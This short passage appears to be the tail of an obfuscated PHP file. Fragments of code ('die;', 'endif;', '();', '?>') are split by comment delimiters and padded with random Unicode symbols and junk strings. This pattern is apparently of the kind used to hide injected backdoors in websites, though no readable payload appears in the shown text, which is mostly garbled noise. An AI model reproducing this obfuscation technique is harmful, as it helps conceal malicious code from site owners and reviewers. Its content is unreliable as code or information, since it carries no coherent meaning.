&㊕☊∝▲╋◢┉⏥✆┅⇄⊘﹛↉◊


@]]w%GxY&㊕☊∝▲╋◢┉⏥✆┅⇄⊘﹛↉◊


-*///
3+5/*-

➷≴⅒╀ↈ∤㊰⋩✜≘⒎↢➋⊨℃♫

.zn➷≴⅒╀ↈ∤㊰⋩✜≘⒎↢➋⊨℃♫

-*///
]/*-5j4uX@r-*///
);/*-


⇇⇄≫⒃☃☺（⇉⑪≔


[o6}{^(t⇇⇄≫⒃☃☺（⇉⑪≔


-*///
/*-


π◆㊧ℒ


2Gjπ◆㊧ℒ


-*///
die;/*-q-n1YrA{v+-*///
 endif;/*-


㈡⋧‐☼﹛⊴⏎✻⊦☴≥♦∌▄⒠㊗✼■｜➋⊊①⋛


?]>S&=9M㈡⋧‐☼﹛⊴⏎✻⊦☴≥♦∌▄⒠㊗✼■｜➋⊊①⋛


-*///
 }/*-+Ijz-*///
}/*-&0TDkY-*///
q/*-;yQDf-*///
::/*-

⊕┧★◤≯

eGK6⊕┧★◤≯

-*///
jYcS/*-
≊︴░㊓≟⋑
VoUT≊︴░㊓≟⋑
-*///
();/*-kLitm-*///
 ?>